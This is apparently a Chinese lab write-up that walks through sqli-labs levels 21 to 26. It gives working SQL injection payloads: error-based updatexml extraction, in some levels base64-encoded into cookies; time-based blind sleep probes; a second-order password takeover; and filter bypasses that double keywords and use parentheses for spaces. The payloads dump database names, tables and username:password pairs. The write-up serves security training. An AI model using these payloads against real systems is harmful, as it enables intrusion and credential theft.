文章目录
sql靶场Less21-
一、sqli-lab靶场
1.轮子模式总结
到目前为止,我总结了一下出现过的轮子,可以得出一个结论,首先需要知道有几个参数,前面6种都是单参数的,多参数的只能通过报错信息得知,用--+还是#也要看报错情况
① n' union select 1,2, '
n可以是1,-1,n'后面可接),select后面看情况设置显示位
② ')--+
)可选,'可换成"
③ ') --+(
)可换成)),(可换成((,'可换成"
④ " --+或' #或' --+
⑤ ' and if(1=1, sleep(1), 1)#
⑥ ") and sleep(1) #
⑦ ', 1, 1)#
⑧ ') and 1 and ('
⑨ '||1||'
⑩ '#或'--+
2.Less-21
a.注入点判断
和20关一样,抓包看下有没有注入,发现一个带cookie的包
但是怎么加都看不到变化,看起来admin被base编码了
居然如此那我在编码里做注入
用YWRtaW4nIw==试下,果然报错了
再加一个单引号试下,没报错,再加又报错,说明存在sql注入
b.轮子测试
用YWRtaW4gJ3doZXJlIDE9MSM=测下
发现单引号右边的都被放到括号里了,我们需要想办法把它放到括号外面
admin ', 1, 1)或admin ', 1)或admin ',都直接输出
而admin '
经过多方测试,发现轮子是admin ') and 1 and ('
')是闭合admin,而('是闭合sql里自带的),中间的1给我们自由发挥
记住轮子执行后都不会报错
c.获取数据库名称
在轮子的基础上将1替换成updatexml(1,concat(0x7e,(SELECT database())),0x7e)
Poc:admin ') and updatexml(1,concat(0x7e,(SELECT database())),0x7e) and ('
BASE64:YWRtaW4gICcpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoU0VMRUNUIGRhdGFiYXNlKCkpKSwweDdlKSBhbmQgKCc=
d.获取表信息
在轮子的基础上将1替换成
updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security' limit 0,1),0x7e), 0x7e)
Poc:admin ') and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security' limit 0,1),0x7e), 0x7e) and ('
BASE64:YWRtaW4gICcpIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsKHNlbGVjdCBHUk9VUF9DT05DQVQodGFibGVfbmFtZSkgRlJPTSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIFdIRVJFIHRhYmxlX3NjaGVtYSA9ICdzZWN1cml0eScgbGltaXQgMCwxKSwweDdlKSwgMHg3ZSkgYW5kICgn
e.获取列信息
在轮子的基础上将1替换成
updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema="security" limit 0,1),0x7e), 0x7e)
Poc:admin ') and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema="security" limit 0,1),0x7e), 0x7e) and ('
BASE64:YWRtaW4gICcpIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0ndXNlcnMnIGFuZCB0YWJsZV9zY2hlbWE9InNlY3VyaXR5IiBsaW1pdCAwLDEpLDB4N2UpLCAweDdlKSBhbmQgKCc=
f.获取表内数据
在轮子的基础上将1替换成
updatexml(1, concat(0x7e, (select username from (select username,password from users limit 3, 1) test), ":", (select password from (select username,password from users limit 3, 1) test2)), 1)
Poc:admin ') and updatexml(1, concat(0x7e, (select username from (select username,password from users limit 3, 1) test), ":", (select password from (select username,password from users limit 3, 1) test2)), 1) and ('
BASE64:YWRtaW4gICcpIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsIChzZWxlY3QgdXNlcm5hbWUgZnJvbSAoc2VsZWN0IHVzZXJuYW1lLHBhc3N3b3JkIGZyb20gdXNlcnMgbGltaXQgMywgMSkgdGVzdCksICI6IiwgKHNlbGVjdCBwYXNzd29yZCBmcm9tIChzZWxlY3QgdXNlcm5hbWUscGFzc3dvcmQgZnJvbSB1c2VycyBsaW1pdCAzLCAxKSB0ZXN0MikpLCAxKSBhbmQgKCc=
通过此关可以得到一些感悟
看到)LIMIT 0,1这样的报错首先应该想到sql里做了过滤,因此只能将左边作为一个参数还给sql语句,右边作为一个参数补齐给sql,中间造一个给我们自己用
如果是LIMIT 0,1那就没有过滤,可以直接加poc
3.Less-22
看来22关还是cookie注入,这关不能再偷看sql语句了,一定要独立完成
a.注入点判断
一样的,还是被BASE64了
发现这关变成了加双引号敏感
看报错好像没做过滤
b.轮子测试
既然没过滤那就直接加#试下
admin "#
果然,没有报错,那么这个轮子" and 1#应该可以用
c.获取数据库名称
在轮子的基础上将1替换成updatexml(1,concat(0x7e,(SELECT database())),0x7e)
Poc:admin" and updatexml(1,concat(0x7e,(SELECT database())),0x7e)#
BASE4:YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoU0VMRUNUIGRhdGFiYXNlKCkpKSwweDdlKSM=
d.获取表信息
updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security' limit 0,1),0x7e), 0x7e)
Poc:admin" and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security' limit 0,1),0x7e), 0x7e)#
BASE64:YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsKHNlbGVjdCBHUk9VUF9DT05DQVQodGFibGVfbmFtZSkgRlJPTSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIFdIRVJFIHRhYmxlX3NjaGVtYSA9ICdzZWN1cml0eScgbGltaXQgMCwxKSwweDdlKSwgMHg3ZSkj
e.获取列信息
在轮子的基础上将1替换成
updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema="security" limit 0,1),0x7e), 0x7e)
Poc:admin" and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema="security" limit 0,1),0x7e), 0x7e)#
BASE64:YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0ndXNlcnMnIGFuZCB0YWJsZV9zY2hlbWE9InNlY3VyaXR5IiBsaW1pdCAwLDEpLDB4N2UpLCAweDdlKSM=
f.获取表内数据
在轮子的基础上将1替换成
updatexml(1, concat(0x7e, (select username from (select username,password from users limit 3, 1) test), ":", (select password from (select username,password from users limit 3, 1) test2)), 1)
Poc:admin" and updatexml(1, concat(0x7e, (select username from (select username,password from users limit 3, 1) test), ":", (select password from (select username,password from users limit 3, 1) test2)), 1)#
BASE64:YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsIChzZWxlY3QgdXNlcm5hbWUgZnJvbSAoc2VsZWN0IHVzZXJuYW1lLHBhc3N3b3JkIGZyb20gdXNlcnMgbGltaXQgMywgMSkgdGVzdCksICI6IiwgKHNlbGVjdCBwYXNzd29yZCBmcm9tIChzZWxlY3QgdXNlcm5hbWUscGFzc3dvcmQgZnJvbSB1c2VycyBsaW1pdCAzLCAxKSB0ZXN0MikpLCAxKSM=
4.Less-23
23关又变回了开始的url注入了,看看这回有什么新花招
a.注入点判断
直接在后面加单引号就发现报错了,再加不会,再加又会,有sql注入
b.轮子测试
通过这个报错好像没过滤
但是直接加2 '#错误并没消失
you have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2 '' LIMIT 0,1' at line 1
也就是说虽然是用单引号触发报错,但是id是字符型,被用双引号了
2" and 1 and '1#
还是报错
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' LIMIT 0,1' at line 1
为啥呢, '1这里还有什么问题吗
通过观察发现左边的并不是双引号,而是两个单引号,因此,将后面这两个单引号拆开来,插入 and 1 and '3'才发现可以用
2' and 1 and '3''#
c.获取数据库名称
在轮子的基础上将1替换成updatexml(1,concat(0x7e,(SELECT database())),0x7e)
Poc:2' and updatexml(1,concat(0x7e,(SELECT database())),0x7e) and '3''#
d.获取表信息
在轮子的基础上将1替换成
updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security' limit 0,1),0x7e), 0x7e)
Poc:2' and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security' limit 0,1),0x7e), 0x7e) and '3''#
e.获取列信息
在轮子的基础上将1替换成
updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema="security" limit 0,1),0x7e), 0x7e)
Poc:2' and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema="security" limit 0,1),0x7e), 0x7e) and '3''#
f.获取表内数据
在轮子的基础上将1替换成
updatexml(1, concat(0x7e, (select username from (select username,password from users limit 3, 1) test), ":", (select password from (select username,password from users limit 3, 1) test2)), 1)
Poc:2' and updatexml(1, concat(0x7e, (select username from (select username,password from users limit 3, 1) test), ":", (select password from (select username,password from users limit 3, 1) test2)), 1) and '3''#
5.Less-24
24关又变回登录模式了
发现这关居然还是存在cookie,试一下看有没有报错
加单引号后输入长度一样,但是这里多出了这段,是不是可以拿来测一下呢
好像也没啥用,看下标题,二级注入是啥意思呢,没办法,新东西只能先网上找找资料了
网上好像叫二次注入
看了别人写的博客后才知道得先创建一个奇葩的账号admin'#
然后去修改这个账号密码可以达到修改admin密码的目的,原因就是sql语句里碰到#会注释后面的内容,嗯,的确很巧妙
那我也来玩一下吧
a.创建特殊用户
先新建这个奇葩用户
创建成功了
b.修改密码
先用刚才创建的用户登录下,然后修改密码
c.修改admin密码
居然成功了,而且居然把admin的密码修改了,这也太绝了
6.Less-25
a.注入点判断
单引号测试发现存在注入
b.轮子测试
?id=2'#
报错
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' LIMIT 0,1' at line 1
分析下sql语句结构
首先''会先给出,因此是不是可以在两个单引号中间注入,像之前的一样
但是,什么情况
2 and 1'#或2 or 1'#
and和or居然都被删除了,那咋整
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2 1'' LIMIT 0,1' at line 1
没关系,咱来个双写绕过
2' anandd 1 anandd '3''#
看到没,and出来了
c.获取数据库名称
在轮子的基础上将1替换成updatexml(1,concat(0x7e,(SELECT database())),0x7e)
Poc:2' anandd updatexml(1,concat(0x7e,(SELECT database())),0x7e) anandd '3''#
d.获取表信息
在轮子的基础上将1替换成
updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security' limit 0,1),0x7e), 0x7e)
2' anandd updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = "security" limit 0,1),0x7e), 0x7e) anandd '3''#
但是居然报错了
居然把名字里的or也去掉了,太恶心了,没办法,只能继续双写
Poc:2' anandd updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM infoorrmation_schema.tables WHERE table_schema = "security" limit 0,1),0x7e), 0x7e) anandd '3''#
这关告诉我们要细心看回显,少一个两个字母就能说明问题所在
e.获取列信息
在轮子的基础上将1替换成
updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema="security" limit 0,1),0x7e), 0x7e)
注意了,这里出现了and,也要换掉哦
Poc:2' anandd updatexml(1, concat(0x7e,(select group_concat(column_name) from infoorrmation_schema.columns where table_name='users' anandd table_schema="security" limit 0,1),0x7e), 0x7e) anandd '3''#
f.获取表内数据
在轮子的基础上将1替换成
updatexml(1, concat(0x7e, (select username from (select username,password from users limit 3, 1) test), ":", (select password from (select username,password from users limit 3, 1) test2)), 1)
一样的or换掉
Poc:2' anandd updatexml(1, concat(0x7e, (select username from (select username,passwoorrd from users limit 3, 1) test), ":", (select passwoorrd from (select username,passwoorrd from users limit 3, 1) test2)), 1) anandd '3''#
细心,细心,再细心,知道不
7.Less-25a
a.注入点判断
看标题是盲注,且过滤了and和or,果然,输入单引号没报错
输入1 and 1=1,和1 and 1=2结果不同,第一个可以输入用户密码
也就是说盲注并不一定一定要看到错误才行,只要有正确结果也可以
b.轮子测试
轮子就是2 anandd if(1=1, sleep(1), 1)
延迟1秒,轮子可用
而2 anandd if(1=2, sleep(1), 1)
c.获取数据库名称
先判断数据库名称长度
2 anandd if(length(database())=8, sleep(1), 1)
延迟1秒,正确
接下来爆破数据库名称
poc:2 anandd if(substr(substr((database()), 1),1,1) = 's', sleep(1), 1)
d.获取表信息
长度判断:2 anandd if(length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security'), 1)) =29, sleep(1), 1)
延迟1秒,正确
爆破表名称
Poc:2 anandd if(substr(substr((select GROUP_CONCAT(table_name) FROM infoorrmation_schema.tables WHERE table_schema = 'security'), 1),1,1) = 's', sleep(1), 1)
e.获取列信息
长度判断:2 anandd if(length(substr((select group_concat(column_name) from infoorrmation_schema.columns where table_name='users' anandd table_schema="security"), 1)) =20, sleep(1), 1)
延迟1秒,正确
爆破列名称
2 anandd if(substr(substr((select group_concat(column_name) from infoorrmation_schema.columns where table_name='users' anandd table_schema='security'), 1),1,1) = 's', sleep(1), 1)
f.获取表内数据
长度判断:
2 anandd if(length(substr((select group_concat(username, ':', passwoorrd) from users), 1)) =210, sleep(1), 1)
爆破表内数据
2 anandd if(substr(substr((select group_concat(username, ':', passwoorrd) from users), 1),1,1) = 's', sleep(1), 1)
发现爆破时开启多线程会报错,没办法,看来这个只能慢慢跑了
8.Less-26
看这关好像要过滤注释,还真是,除了and or被过滤之外注释也被过滤
2'--+不管用了,照样报错
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' LIMIT 0,1' at line 1
2'a#
a.注入点判断
注入点是有的,但是都被过滤了,接下来只能看怎么绕了
b.轮子测试
同样的错误之前这个轮子是可以的2' anandd 1 anandd '3''#
但是加了过滤之后就变成这样了
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and1and'3''' LIMIT 0,1' at line 1
也就是说它连空格都去掉了,这个过滤得有点狠了,没办法,只能上网上找答案了
经过多方测试,发现只有这种情况符合,不用再纠结要不要用注释#了
2'||1||'
c.获取数据库名称
在轮子的基础上将1替换成updatexml(1,concat(0x7e,(SELECT database())),0x7e)
同时用括号替代空格
Poc:2'||updatexml(1,concat(0x7e,(SELECT (database()))),0x7e)||'
d.获取表信息
在轮子的基础上将1替换成
updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security'),0x7e), 0x7e)
记住需要在有空格的地方增加()
Poc:2'||updatexml(1, concat(0x7e,(select (GROUP_CONCAT(table_name)) FROM (infoorrmation_schema.tables) WHERE (table_schema = 'security')),0x7e), 0x7e)||'
e.获取列信息
在轮子的基础上将1替换成
updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema="security" ),0x7e), 0x7e)
Poc:2'||updatexml(1, concat(0x7e,(select (group_concat(column_name)) from (infoorrmation_schema.columns) where (table_name='users') anandd (table_schema="security") ),0x7e), 0x7e)||'
f.获取表内数据
在轮子的基础上将1替换成
updatexml(1, concat(0x7e,(select group_concat(username,":", password) from users where id = 4),0x7e), 0x7e)
2'||updatexml(1, concat(0x7e,(select group_concat(username,":", password) from users where id = 4),0x7e), 0x7e)||'
必要的地方加上括号后
Poc:2'||updatexml(1, concat(0x7e,(select (group_concat(username,":", passwoorrd)) from (users) where (id) = 4),0x7e), 0x7e)||'
其中id=4可以自己换取要拿第几行数据,如
空格绕过我查了很多资料,可是发现通通没用,在这里只能用括号饶过